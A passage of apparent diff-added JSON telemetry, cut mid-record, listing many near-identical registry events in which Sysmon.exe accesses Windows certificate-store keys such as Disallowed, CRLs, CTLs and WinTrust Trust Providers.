"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247450016, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": 
"Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + 
"registry_value": "Certificates", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 